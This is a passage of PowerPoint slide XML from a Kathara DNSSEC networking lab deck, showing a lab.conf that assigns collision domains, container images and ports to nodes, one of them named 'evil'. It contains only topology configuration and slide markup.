                <a:t>pc3[port]="3001:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bridged</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>true</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[1]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[2]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>seed-server:apache-php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[3]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[1]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot2[0]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot2[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8486D852-01F0-3AC3-9A19-10E061848E34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262821713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3EFD25-987A-CE6C-1267-5AC91AF39B0D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B5BC90B-929D-421D-776B-4A99A378BD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03296E4A-889F-CD90-350E-61FD68E7AA90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662B3FBA-FCC6-D548-5BE9-B63911BC7C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECB3F56-D8F4-1B4D-70CA-9E1B427C2E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1B426A-B777-D756-6709-42509CD38D85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2[0]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[2]="H"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[0]="H"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>w</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ireshark</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[bridged]=true</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>linuxserver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/wireshark"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[port]="3000:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>num_terms</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C91164-E86E-868B-0775-F66415646EC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370680287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BAF8A3-62F9-FB5C-6EB5-3069ABCE802F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A8A2AD9-00D0-EA31-F1B0-6EC77B8F3D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
